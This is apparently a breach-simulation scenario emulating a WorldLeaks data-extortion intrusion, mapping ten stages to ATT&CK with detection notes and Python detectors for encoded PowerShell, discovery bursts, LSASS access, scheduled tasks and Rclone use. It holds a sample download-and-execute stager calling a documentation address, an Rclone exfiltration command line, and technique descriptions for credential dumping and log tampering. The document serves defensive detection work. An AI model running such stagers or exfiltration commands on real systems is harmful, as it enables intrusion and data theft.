WorldLeaks Document Exfiltration Campaign
Overview
WorldLeaks: Pure Extortion Campaign
Category: Data Exfiltration | Severity: Critical | Focus: Incident Response
Executive Summary
This scenario emulates a full-chain WorldLeaks (formerly Hunters International) pure extortion attack, based on the SOSRansomware threat intelligence report and corroborated by Group-IB and Lexfo Security research.
WorldLeaks is the successor of Hunters International, which itself emerged from Hive ransomware's infrastructure. In January 2025 the group pivoted from double extortion (encrypt and leak) to pure extortion: data is stolen and held for ransom, but systems are not encrypted. This scenario emulates the TTP chain documented in those reports, from initial access via spearphishing to data exfiltration with Rclone, with emphasis on the collection and exfiltration phases that define the group's operating model.
Threat Actor Profile
| Attribute | Details |
|---|---|
| Name | WorldLeaks (formerly Hunters International, Hive lineage) |
| Active Since | January 2025 (rebrand from Hunters International) |
| Model | Pure extortion: data theft without encryption |
| Infrastructure | 4-tier architecture: Storage Software → Automation Server → Proxy Layer → Victim Network |
| Notable Victims | Dell (1.3 TB / 416,103 files), L3Harris, Tata Technologies |
| Recruitment | Actively recruits affiliates on underground forums |
IOCs Referenced
| IOC | Type | Context |
|---|---|---|
| 6a9c0f3f2c7d9e9fd2e33e71b91d5e5f6cbd27ef | SHA-1 | Custom exfiltration tool binary |
| e4c1a3e345a2f5d872ea04cd1fd3a7725b927ffa | SHA-1 | Vulnerable kernel driver (BYOVD) |
| 185.217.69.101 | IPv4 | C2 infrastructure (referenced only; never contacted by any payload, safe-by-design) |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Run\wldboot | Registry Key | Persistence mechanism |
Kill Chain: 10 Injects
Stage 1 - Initial Access: Spearphishing Macro Execution
| | |
|---|---|
| ATT&CK | T1566.001 - Phishing: Spearphishing Attachment |
| Delay | T+0s (scenario start) |
| Description | Simulates delivery of a weaponized Office document carrying a VBA macro. WorldLeaks affiliates commonly use spearphishing emails with macro-enabled attachments (.xlsm, .docm) as the initial compromise vector; the macro provides the first code execution on the victim endpoint. |
| What it does | Drops and executes a simulated macro payload, producing process creation artifacts consistent with an Office application spawning a shell (winword.exe or excel.exe → cmd.exe / powershell.exe). |
| Detection opportunities | Office applications spawning child processes (Security 4688 / Sysmon Event ID 1 with a winword.exe or excel.exe parent), VBA macro execution events, and suspicious file writes by Office processes. |
Stage 2 - Execution: Encoded PowerShell Stager
| | |
|---|---|
| ATT&CK | T1059.001 - Command and Scripting Interpreter: PowerShell |
| Delay | T+2min |
| Description | Following macro execution, WorldLeaks deploys a Base64-encoded PowerShell stager to establish a foothold. Encoding defeats naive string matching on the command line (a rule looking for "DownloadString" or "IEX" in the raw process command line never sees those words), but it is not invisible: the encoded blob is still recorded in Security 4688 / Sysmon Event ID 1, and PowerShell decodes it before execution, so script block logging (4104) and AMSI see the plaintext. |
| What it does | Executes a Base64-encoded PowerShell command that performs reconnaissance and creates persistence artifacts, mirroring the group's use of -EncodedCommand. |
| Detection opportunities | powershell.exe with -EncodedCommand (or its short forms -e / -ec / -enc) on the command line, long Base64 strings in process creation events, and the decoded script in PowerShell ScriptBlock logging (Event ID 4104). Decode the blob (Base64, then UTF-16LE) during triage rather than alerting on the encoded string alone. |
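Decoding the encoded command line is the first thing an analyst does with a 4688 or Sysmon Event ID 1 record from this stage. The following Python is an added example and is not part of the original scenario or its payloads: it recognises the -e, -ec and -EncodedCommand prefix forms that powershell.exe accepts, decodes the Base64/UTF-16LE blob, and scores the plaintext against an illustrative token list. The sample stager, the 203.0.113.10 address (TEST-NET-3 documentation range) and the token list are constructed for the example and should be tuned per environment.

```python
import base64
import binascii

# Constructed sample stager for the example (not from the original scenario).
# The address is in the TEST-NET-3 documentation range, so it never resolves to a real host.
SAMPLE_STAGER = (
    "$w = New-Object Net.WebClient; "
    "IEX $w.DownloadString('http://203.0.113.10/s.ps1')"
)

# Illustrative indicators of a stager; extend per environment (assumption).
SUSPICIOUS_TOKENS = (
    "IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
    "Net.WebClient", "Invoke-WebRequest", "FromBase64String",
    "Add-MpPreference", "wevtutil", "schtasks", "rclone",
)


def encode_for_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _is_encoded_flag(token: str) -> bool:
    """True for -EncodedCommand and the prefixes powershell.exe accepts (-e, -en, -enc, ...), plus -ec."""
    if not token or token[0] not in "-/":
        return False
    name = token[1:].lower()
    if name == "ec":
        return True
    return name.startswith("e") and "encodedcommand".startswith(name)


def decode_encoded_command(cmdline: str):
    """Return the decoded script carried by -EncodedCommand, or None if absent or malformed.

    Base64 contains no whitespace, so a plain split is enough to isolate the blob.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_flag(tok):
            blob = tokens[i + 1].strip("'\"")
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None  # flag present but payload is not a valid encoded command
    return None


def analyze(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and score the plaintext."""
    decoded = decode_encoded_command(cmdline)
    hits = []
    if decoded is not None:
        low = decoded.lower()
        hits = [t for t in SUSPICIOUS_TOKENS if t.lower() in low]
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "hits": hits,
        "alert": decoded is not None and bool(hits),
    }


if __name__ == "__main__":
    sample = "powershell.exe -nop -w hidden -enc " + encode_for_powershell(SAMPLE_STAGER)
    print(analyze(sample))
```

The round trip through `encode_for_powershell` is the useful part for detection engineering: it lets you generate the exact command line a stager would produce and confirm that your SIEM rule fires on the decoded content rather than on a brittle substring of the Base64.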
Stage 3 - Discovery: System & Network Reconnaissance
| | |
|---|---|
| ATT&CK | T1082 - System Information Discovery / T1135 - Network Share Discovery |
| Delay | T+4min |
| Description | WorldLeaks operators perform extensive reconnaissance to identify high-value data stores before exfiltration. This includes system profiling, network share enumeration, and identification of accessible file servers β critical for their pure extortion model where data selection directly impacts ransom leverage. |
| What it does | Executes native Windows commands (systeminfo, net share, net view, ipconfig /all) to enumerate the local system and network topology. Results are collected for operator review. |
| Detection opportunities | Rapid succession of discovery commands, net.exe/net1.exe execution, unusual enumeration patterns from a single endpoint. |
Stage 4 - Discovery: Security Software Discovery
| | |
|---|---|
| ATT&CK | T1518.001 - Software Discovery: Security Software Discovery (the process enumeration it relies on also maps to T1057 - Process Discovery) |
| Delay | T+6min |
| Description | Before escalating privileges and moving laterally, WorldLeaks operators enumerate running security products to tailor their evasion techniques. Identifying EDR agents, antivirus solutions, and monitoring tools allows them to select the appropriate defense evasion strategy for the target environment. |
| What it does | Enumerates running processes and installed services to identify security software (EDR agents, AV products, SIEM collectors). Uses native Windows commands and WMI queries. |
| Detection opportunities | WMI queries targeting AntiVirusProduct class, process enumeration focused on security tools, tasklist / Get-Process with filtering patterns. |
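Each command in Stages 3 and 4 is benign on its own; the detection value lies in their temporal clustering on one host. The following Python is an added example and not part of the scenario's own content: it categorises constructed Sysmon Event ID 1 records into discovery classes, slides a five-minute window per host, and raises one alert for the densest window that holds at least four distinct classes, tagging the WMI AntiVirusProduct query separately. The event records, class definitions, window size and threshold are constructed assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery classes keyed on image name and (lower-cased) command line.
# The list is illustrative; tune it per environment (assumption).
DISCOVERY_RULES = (
    ("systeminfo", lambda img, cl: img == "systeminfo.exe"),
    ("net_share",  lambda img, cl: img in ("net.exe", "net1.exe") and " share" in cl),
    ("net_view",   lambda img, cl: img in ("net.exe", "net1.exe") and " view" in cl),
    ("ipconfig",   lambda img, cl: img == "ipconfig.exe"),
    ("whoami",     lambda img, cl: img == "whoami.exe"),
    ("nltest",     lambda img, cl: img == "nltest.exe"),
    ("proc_enum",  lambda img, cl: img == "tasklist.exe" or "get-process" in cl),
    ("av_wmi",     lambda img, cl: "antivirusproduct" in cl or "securitycenter2" in cl),
)

# Constructed Sysmon Event ID 1 records (fields named as Sysmon names them).
SAMPLE_EVENTS = [
    {"UtcTime": "2025-03-01 10:00:00.000", "Computer": "WS01", "Image": r"C:\Windows\System32\systeminfo.exe", "CommandLine": "systeminfo"},
    {"UtcTime": "2025-03-01 10:00:05.000", "Computer": "WS01", "Image": r"C:\Windows\System32\net.exe", "CommandLine": "net share"},
    {"UtcTime": "2025-03-01 10:00:12.000", "Computer": "WS01", "Image": r"C:\Windows\System32\net.exe", "CommandLine": "net view /all"},
    {"UtcTime": "2025-03-01 10:00:20.000", "Computer": "WS01", "Image": r"C:\Windows\System32\ipconfig.exe", "CommandLine": "ipconfig /all"},
    {"UtcTime": "2025-03-01 10:02:00.000", "Computer": "WS01", "Image": r"C:\Windows\System32\wbem\WMIC.exe", "CommandLine": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    {"UtcTime": "2025-03-01 09:00:00.000", "Computer": "WS02", "Image": r"C:\Windows\System32\ipconfig.exe", "CommandLine": "ipconfig /all"},
    {"UtcTime": "2025-03-01 11:00:00.000", "Computer": "WS02", "Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami /all"},
]


def categorize(image: str, cmdline: str) -> list:
    """Return the discovery classes a single process creation event belongs to."""
    img = image.lower().rsplit("\\", 1)[-1]
    cl = " " + cmdline.lower()  # leading space lets " share" match a leading verb
    return [name for name, pred in DISCOVERY_RULES if pred(img, cl)]


def detect_discovery_bursts(events, window=timedelta(minutes=5), threshold=4) -> list:
    """One alert per host for the densest window holding at least `threshold` discovery classes."""
    by_host = defaultdict(list)
    for ev in events:
        cats = categorize(ev["Image"], ev["CommandLine"])
        if cats:
            by_host[ev["Computer"]].append((datetime.fromisoformat(ev["UtcTime"]), cats, ev["CommandLine"]))
    alerts = []
    for host, items in by_host.items():
        items.sort(key=lambda x: x[0])
        best, start = None, 0
        for end, (t, _, _) in enumerate(items):
            while items[start][0] < t - window:  # slide the window's left edge forward
                start += 1
            seen = set()
            for _, cats, _ in items[start:end + 1]:
                seen.update(cats)
            if len(seen) >= threshold and (best is None or len(seen) > len(best["categories"])):
                best = {
                    "host": host,
                    "window_start": items[start][0].isoformat(sep=" "),
                    "window_end": t.isoformat(sep=" "),
                    "categories": sorted(seen),
                    "commands": [c for _, _, c in items[start:end + 1]],
                    "av_discovery": "av_wmi" in seen,
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_discovery_bursts(SAMPLE_EVENTS):
        print(alert)
```

Counting distinct classes rather than raw command volume is what keeps this from firing on an administrator who runs `ipconfig /all` twenty times; the AntiVirusProduct query is reported on its own because a single occurrence of it from a workstation is already worth a look.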
Stage 5 - Credential Access: LSASS Credential Dump (ProcDump)
| | |
|---|---|
| ATT&CK | T1003.001 - OS Credential Dumping: LSASS Memory |
| Delay | T+8min |
| Description | WorldLeaks operators dump LSASS process memory to extract plaintext credentials, NTLM hashes and Kerberos tickets. ProcDump, a Microsoft-signed Sysinternals tool, is used to write the dump because a signed vendor binary is far less likely to be blocked by antivirus than Mimikatz; the dump is then parsed offline. The handle it opens on lsass.exe is still visible to EDR and Sysmon. This technique was specifically observed in Hunters International / WorldLeaks campaigns. |
| What it does | Downloads ProcDump (with prerequisite check) and creates a full memory dump of the LSASS process. The dump file is written to a controlled artifact directory and deleted during cleanup. |
| Detection opportunities | Sysmon Event ID 10 (ProcessAccess) with TargetImage lsass.exe and a GrantedAccess mask that includes PROCESS_VM_READ (0x10), ProcDump executed with -ma and lsass as the target, creation of .dmp files outside known crash-dump locations, and Credential Guard or LSA protection (RunAsPPL) denials, which block the handle open outright. |
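The Sysmon Event ID 10 record from this stage carries the access mask the dumping process requested on lsass.exe, and that mask is what separates a memory dump from the routine handle opens that security products and system processes perform. The following Python is an added example, not part of the scenario: it decodes GrantedAccess, keeps only masks that include PROCESS_VM_READ, suppresses an environment-specific allowlist of source images, and rates the hit higher for a full-access mask, write access, or a call trace through unbacked memory. The events, the allowlist and the severity rules are constructed assumptions; the access-right constants are the Win32 values.

```python
# Win32 process access rights relevant to reading LSASS memory.
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS_MASK = 0x1FFFFF  # what ProcDump -ma and many dumpers request

# Assumption: per-environment allowlist of images that legitimately open LSASS.
BENIGN_SOURCE_IMAGES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Sysmon Event ID 10 (ProcessAccess) records for the example.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\alice\Downloads\procdump64.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4|C:\Windows\System32\KERNELBASE.dll+2bcfe"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1000", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4"},
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\upd.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4|UNKNOWN(00000000DEADBEEF)"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\Downloads\procdump64.exe", "TargetImage": r"C:\Windows\System32\notepad.exe",
     "GrantedAccess": "0x1FFFFF", "CallTrace": ""},
]


def decode_access_mask(granted: str) -> list:
    """Name the memory-relevant rights present in a GrantedAccess hex string."""
    mask = int(granted, 16)
    names = {
        PROCESS_VM_READ: "VM_READ",
        PROCESS_VM_WRITE: "VM_WRITE",
        PROCESS_QUERY_INFORMATION: "QUERY_INFORMATION",
        PROCESS_QUERY_LIMITED_INFORMATION: "QUERY_LIMITED_INFORMATION",
    }
    return [n for bit, n in names.items() if mask & bit]


def lsass_access_alerts(events) -> list:
    """Alert on handles to lsass.exe that could read its memory, ignoring allowlisted images."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 10 or not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        mask = int(ev["GrantedAccess"], 16)
        if not mask & PROCESS_VM_READ:
            continue  # this handle cannot read memory, so it cannot produce a dump
        if ev["SourceImage"].lower() in BENIGN_SOURCE_IMAGES:
            continue
        unbacked = "UNKNOWN" in ev.get("CallTrace", "")  # call frame in memory not backed by a file
        severity = "high" if (mask == PROCESS_ALL_ACCESS_MASK or mask & PROCESS_VM_WRITE or unbacked) else "medium"
        alerts.append({
            "source": ev["SourceImage"],
            "mask": hex(mask),
            "rights": decode_access_mask(ev["GrantedAccess"]),
            "unbacked_call_trace": unbacked,
            "severity": severity,
        })
    return alerts


def is_lsass_dump_cmdline(cmdline: str) -> bool:
    """ProcDump-style command line: a dump-type switch (-ma, -mp, -mm) plus lsass as the target."""
    low = cmdline.lower()
    return "lsass" in low and any(t in ("-ma", "-mp", "-mm") for t in low.split())


if __name__ == "__main__":
    for alert in lsass_access_alerts(SAMPLE_EVENTS):
        print(alert)
```

The allowlist is the part that needs care: it should be keyed on full image paths (and ideally signer), because a dumper dropped as `C:\Users\alice\MsMpEng.exe` must not inherit the trust of the real Defender engine.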
Stage 6 - Defense Evasion: Disable Windows Event Logging
| | |
|---|---|
| ATT&CK | T1562.002 - Impair Defenses: Disable Windows Event Logging |
| Delay | T+10min |
| Description | Before proceeding to lateral movement and data collection, WorldLeaks operators disable or tamper with Windows event logging to blind SIEM and forensic analysis. This is a critical step in their playbook: in a pure extortion intrusion the victim's first question is "what was taken", and a thinned evidence trail makes that scoping harder, which the group uses as negotiation leverage. |
| What it does | Stops Windows event logging after backing up the prior state. All original settings are saved and restored during cleanup. |
| Detection opportunities | Event ID 1100 (the event logging service has shut down), 1102 (the Security log was cleared) and System log Event ID 104 (a log file was cleared); wevtutil cl / sl and Stop-Service eventlog on command lines; audit policy changes; and gaps in event continuity (a host that stops forwarding events while its agent heartbeat continues). |
Stage 7 - Persistence: Scheduled Task
| | |
|---|---|
| ATT&CK | T1053.005 - Scheduled Task/Job: Scheduled Task |
| Delay | T+12min |
| Description | WorldLeaks establishes persistence via scheduled tasks to maintain access across reboots. The Run key IOC (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\wldboot, T1547.001) from threat intelligence shows they also use Run keys, but scheduled tasks offer more flexible execution options and can be bound to specific triggers (logon, idle, time-based). This lets the operator return to the environment if the initial access channel is lost. |
| What it does | Creates a scheduled task that simulates WorldLeaks persistence. The task is fully removed during cleanup; no durable attacker capability is left behind. |
| Detection opportunities | schtasks.exe /create on the command line; Security Event ID 4698 (scheduled task created; requires the "Audit Other Object Access Events" subcategory, and its TaskContent field carries the full task XML); new task files under C:\Windows\System32\Tasks\; and task actions pointing to powershell.exe or cmd.exe, especially with encoded arguments. |
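Event ID 4698 carries the full task definition as XML in its TaskContent field, which is where the details worth alerting on live: the action's command and arguments, the trigger type, the principal and the run level. The following Python is an added example, not part of the scenario: it parses that XML with the Task Scheduler namespace and flags tasks whose action runs a scripting host, carries encoded or download-style arguments, points into a user-writable path, or asks for the highest available privileges. Both task definitions are constructed for the example, and the indicator lists are assumptions to tune per environment.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Illustrative indicator lists (assumptions; tune per environment).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
SUSPICIOUS_ARGS = ("-enc", "-ec ", "-encodedcommand", "iex", "downloadstring",
                   "http://", "https://", "-w hidden", "-nop")
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\", "\\public\\")

# Constructed TaskContent payloads shaped like the XML Windows records in 4698.
# The -enc blob is the UTF-16LE/Base64 encoding of "whoami".
SUSPICIOUS_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-21-1-2-3-1001</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-nop -w hidden -enc dwBoAG8AYQBtAGkA</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-03-01T02:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files\Vendor\backup.exe</Command>
    <Arguments>--nightly</Arguments>
  </Exec></Actions>
</Task>"""

_XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def parse_task_content(xml_text: str) -> dict:
    """Extract actions, trigger types, principal and run level from 4698 TaskContent XML."""
    # The declaration claims UTF-16, but we already hold decoded text, so drop it before parsing.
    root = ET.fromstring(_XML_DECL.sub("", xml_text, count=1))
    actions = [
        ((ex.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip(),
         (ex.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip())
        for ex in root.findall(".//t:Actions/t:Exec", TASK_NS)
    ]
    trig = root.find("t:Triggers", TASK_NS)
    triggers = [] if trig is None else [child.tag.split("}")[-1] for child in trig]
    return {
        "actions": actions,
        "triggers": triggers,
        "user_id": root.findtext(".//t:Principal/t:UserId", default="", namespaces=TASK_NS),
        "run_level": root.findtext(".//t:Principal/t:RunLevel", default="", namespaces=TASK_NS),
    }


def assess_task(task_name: str, xml_text: str) -> dict:
    """Score one 4698 event: returns the parsed task plus the reasons it looks suspicious."""
    info = parse_task_content(xml_text)
    reasons = []
    for cmd, args in info["actions"]:
        exe = cmd.strip('"').lower().rsplit("\\", 1)[-1]
        if exe in SCRIPT_HOSTS:
            reasons.append(f"action runs {exe}")
        hit = next((tok for tok in SUSPICIOUS_ARGS if tok in args.lower()), None)
        if hit:
            reasons.append(f"arguments contain {hit.strip()!r}")
        if any(d in cmd.lower() for d in USER_WRITABLE):
            reasons.append("command lives in a user-writable path")
    if info["run_level"].lower() == "highestavailable":
        reasons.append("requests HighestAvailable run level")
    return {"task": task_name, **info, "reasons": reasons, "suspicious": bool(reasons)}


if __name__ == "__main__":
    print(assess_task(r"\Updater\SyncCheck", SUSPICIOUS_TASK_XML))
    print(assess_task(r"\Vendor\NightlyBackup", BENIGN_TASK_XML))
```

Parsing the XML rather than regex-matching the rendered event text is deliberate: the same task can be described with different whitespace and element order, and the namespace-qualified lookup still finds the `Exec` action whether or not a `ComHandler` action precedes it.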
Stage 8 - Collection: Sensitive Data Harvesting
| | |
|---|---|
| ATT&CK | T1039 - Data from Network Shared Drive / T1074.001 - Data Staged: Local Data Staging |
| Delay | T+14min |
| Description | Core WorldLeaks TTP. Operators systematically harvest sensitive data from network shares and local repositories. In the Dell breach, WorldLeaks exfiltrated 1.3 TB across 416,103 files. Their custom "Storage Software" component automates file discovery and collection by file type, size and path pattern, prioritising financial documents, intellectual property, HR records and customer data for maximum extortion leverage. |
| What it does | Discovers and catalogs files matching sensitive patterns across accessible storage locations. Target paths come from parameterized OpenAEV arguments; no hostnames or shares are hardcoded. |
| Detection opportunities | Unusual file access patterns (bulk reads), enumeration of many network shares in quick succession (bursts of Security Event ID 5145 from one client on file servers), file metadata collection activity, and creation of a staging directory that fills rapidly. |
Stage 9 - Collection: Data Staging & Compression
| | |
|---|---|
| ATT&CK | T1560.001 - Archive Collected Data: Archive via Utility |
| Delay | T+16min |
| Description | Core WorldLeaks TTP. Before exfiltration, collected data is compressed into password-protected archives. This serves two purposes: reducing transfer volume, and defeating DLP and content inspection, which cannot look inside an encrypted archive (with 7-Zip's -mhe header encryption even the file names are hidden). In the Dell breach, WorldLeaks compressed 1.3 TB of data before exfiltration through their proxy infrastructure. |
| What it does | Compresses target files into a password-protected archive. Target paths and the password come from OpenAEV arguments; nothing is hardcoded. Full cleanup removes the archiving tool and all archive artifacts. |
| Detection opportunities | Archive utility execution with a password switch (-p, and -mhe for 7-Zip header encryption), creation of unusually large archives, compression launched from non-standard paths or by a user who does not normally archive data, and file access patterns indicating bulk collection. |
Stage 10 - Exfiltration: Rclone Cloud Upload
| | |
|---|---|
| ATT&CK | T1567 - Exfiltration Over Web Service (specifically T1567.002 - Exfiltration to Cloud Storage) |
| Delay | T+18min |
| Description | Signature WorldLeaks technique. The group uses Rclone, a legitimate cloud synchronization tool, to exfiltrate archived data to attacker-controlled cloud storage. Rclone supports 40+ storage backends, making it extremely versatile for data theft. WorldLeaks' 4-tier infrastructure routes exfiltrated data through proxy layers to their Storage Software servers. This is the culmination of the pure extortion model: steal, don't encrypt. |
| What it does | Downloads Rclone (with prerequisite check), writes a configuration whose remote points at a non-existent endpoint (safe-by-design: no data leaves the network), and runs the upload command. The payload generates the process creation, network connection and configuration artifacts a real Rclone exfiltration would produce, minus the transfer itself. Full cleanup removes Rclone, its config and all artifacts. |
| Detection opportunities | rclone.exe execution (or a renamed copy: match on the PE OriginalFileName rather than the file name), creation of rclone.conf (default location %APPDATA%\rclone\rclone.conf, or any path passed via --config), outbound HTTPS to cloud storage APIs from a host that does not normally use them, sustained large outbound transfers, DNS queries for cloud provider domains, and command lines containing copy, sync or move with a remote:path destination. |
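Rclone leaves two artifacts that are cheap to inspect after Stages 8 to 10: the remote definitions in rclone.conf (an INI file) and the command line of the upload itself. The following Python is an added example, not the scenario's payload: it inventories remotes from a constructed rclone.conf, then parses a process creation command line for an exfiltration verb, a remote:path destination, risky flags and a renamed binary (via Sysmon's OriginalFileName). The config, command lines, risky-flag list and remote-name check are constructed assumptions; flag values are assumed in --flag=value form, since the plain whitespace split used here would treat a space-separated value as a positional argument.

```python
import configparser
import re

# rclone subcommands that move data; lsd/ls/about are reconnaissance only.
EXFIL_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Flags that tune an exfil or weaken TLS checks (illustrative assumption).
RISKY_FLAGS = {"--no-check-certificate", "--ignore-existing", "--transfers",
               "--bwlimit", "--config", "-q", "--quiet"}
# rclone remote:path syntax; the remote name must be 2+ characters so C:\ never matches.
REMOTE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]+:")

# Constructed rclone.conf for the example (credentials are placeholders).
SAMPLE_RCLONE_CONF = """
[mega]
type = mega
user = drop@example.invalid
pass = REDACTED

[s3drop]
type = s3
provider = Other
access_key_id = REDACTED
secret_access_key = REDACTED
endpoint = https://storage.example.invalid
"""

# Constructed command line as Sysmon Event ID 1 would record it.
SAMPLE_CMDLINE = (r"rclone.exe copy C:\Users\Public\staging\finance.7z mega:drop "
                  r"--transfers=16 --no-check-certificate -q --config=C:\Users\Public\rc.conf")


def parse_rclone_conf(text: str) -> dict:
    """Map remote name -> backend type and endpoint/host, if any."""
    cp = configparser.ConfigParser(interpolation=None)  # rclone values may contain '%'
    cp.read_string(text)
    remotes = {}
    for name in cp.sections():
        sec = cp[name]
        remotes[name] = {
            "type": sec.get("type", "?"),
            "endpoint": sec.get("endpoint") or sec.get("url") or sec.get("host"),
        }
    return remotes


def _is_remote(token: str) -> bool:
    """True for rclone remote:path tokens; URLs also contain 'scheme:' and are excluded."""
    return bool(REMOTE_RE.match(token)) and not token.lower().startswith(("http:", "https:"))


def analyze_rclone_cmdline(cmdline: str, original_file_name=None) -> dict:
    """Classify an rclone invocation; original_file_name is Sysmon's PE OriginalFileName field."""
    tokens = cmdline.split()
    image = tokens[0].strip('"').lower().rsplit("\\", 1)[-1] if tokens else ""
    renamed = (original_file_name or "").lower() == "rclone.exe" and image != "rclone.exe"
    verb = next((t.lower() for t in tokens[1:] if t.lower() in EXFIL_VERBS), None)
    positionals = [t for t in tokens[1:] if not t.startswith("-") and t.lower() != verb]
    remotes = [t for t in positionals if _is_remote(t)]
    flags = {t.split("=", 1)[0] for t in tokens if t.startswith("-")}
    dest = positionals[-1] if positionals else None  # rclone puts the destination last
    return {
        "image": image,
        "renamed": renamed,
        "verb": verb,
        "remotes": remotes,
        "risk_flags": sorted(flags & RISKY_FLAGS),
        "upload": verb is not None and dest is not None and _is_remote(dest),
    }


if __name__ == "__main__":
    print(parse_rclone_conf(SAMPLE_RCLONE_CONF))
    print(analyze_rclone_cmdline(SAMPLE_CMDLINE, original_file_name="rclone.exe"))
```

The `upload` decision hinges on the destination being a remote, which is what distinguishes exfiltration from a download of tooling with the same binary; a `--config` pointing outside `%APPDATA%\rclone` is a strong secondary signal because operators usually drop the config next to the staged archive rather than in the user profile.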
Security Checklist
| Criterion | Status |
|---|---|
| No C2 / reverse shell / beacon | Pass: all traffic stays local or targets non-existent endpoints |
| No real malware / ransomware binaries | Pass: only native Windows tools and legitimate utilities |
| No actual data exfiltration | Pass: Rclone targets a non-routable, non-existent endpoint |
| Cleanup removes all artifacts | Pass: dumps, archives, logs and tools are all removed |
| Cleanup removes persistence | Pass: scheduled tasks deleted |
| Cleanup restores security settings | Pass: event logging state restored from backup |
| ATT&CK mapping on every inject | Pass: every inject carries a technique ID; 8 tactics covered |
| No hardcoded hostnames/IPs | Pass: OpenAEV arguments used for parameterization |
| Uses existing verified payloads | Pass: no ad hoc custom payloads; all come from the verified library |
Value Proposition
- Source-driven realism: every stage maps to WorldLeaks TTPs documented in the SOSRansomware report, Group-IB research and Lexfo Security analysis
- Exfiltration emphasis: Stages 8-10 specifically reproduce WorldLeaks' pure extortion model (collect, archive, exfiltrate), which differentiates the group from traditional ransomware operations
- Detection validation: each inject generates real artifacts (process creation, file system, registry, network) that exercise EDR/SIEM detection rules
- Safe-by-design: runs on production-like environments with no real C2, no real exfiltration and complete cleanup
- Parameterized payloads: OpenAEV arguments allow customization per environment without modifying payload code
- Complete kill chain coverage: every inject is mapped to ATT&CK, spanning 8 tactics from Initial Access to Exfiltration, for end-to-end detection gap analysis
Total execution time: ~18 minutes | 10 injects | 8 ATT&CK tactics covered (Initial Access, Execution, Discovery, Credential Access, Defense Evasion, Persistence, Collection, Exfiltration)